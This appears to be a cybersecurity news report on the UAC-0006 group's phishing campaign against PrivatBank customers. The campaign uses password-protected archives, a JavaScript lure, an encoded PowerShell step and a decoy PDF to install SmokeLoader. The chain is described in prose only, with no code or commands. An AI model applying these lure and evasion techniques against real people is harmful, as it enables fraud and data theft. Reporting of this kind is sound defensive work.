The financially motivated threat actor group UAC-0006 has been identified as the mastermind behind a sophisticated phishing campaign targeting customers of PrivatBank, Ukraine’s largest state-owned bank. According to research conducted by cybersecurity firm CloudSEK, this malicious activity has been ongoing since at least November 2024. The attackers have been using deceptive emails containing password-protected archives, cleverly disguised as legitimate documents such as payment instructions or scanned copies of personal identification.
One example of a phishing lure used in this campaign is a JavaScript file masquerading as a payment instruction document. These malicious emails aim to deploy SmokeLoader malware onto victims’ systems, with approximately 24 unique instances detected in the wild thus far. The attackers have employed various techniques to avoid detection, including password-protecting the archives and leveraging legitimate system binaries in the infection chain.
The phishing emails typically contain password-protected ZIP or RAR files as attachments. When victims open the attachments and enter the password, a malicious JavaScript file is extracted and executed. This file then injects code into a legitimate Windows process and runs an encoded PowerShell command. The PowerShell script serves two main functions: displaying a decoy PDF document to mask the malicious activity and contacting the attackers’ command-and-control server to download and execute the SmokeLoader malware.
Researchers have noted that UAC-0006 favors phishing lures with malicious capabilities and extensively uses PowerShell, JavaScript, VBScript, and LNK files in their attacks. This persistent targeting of PrivatBank customers suggests a clear focus on financial gain. Additionally, similarities in tactics, techniques, and procedures (TTPs) with other threat actor groups like EmpireMonkey and FIN7 hint at potential connections to Russian APT activity. FIN7, in particular, has connections to the Black Basta ransomware operation.
Furthermore, SmokeLoader malware has been actively used in campaigns targeting Ukraine, often attributed to Russian threat actors for espionage and financial gain. Recent reports have highlighted instances where Russian threat actors exploited vulnerabilities in software like 7-Zip to deploy SmokeLoader, emphasizing the severity of this threat.
The implications of this campaign are significant, as it poses a risk of compromising sensitive personal and financial data, credential harvesting, espionage, and reputational damage to organizations. Additionally, there is a potential for supply chain attacks, which could impact various associated organizations. It is crucial for individuals and organizations to remain vigilant and implement robust cybersecurity measures to protect against such threats.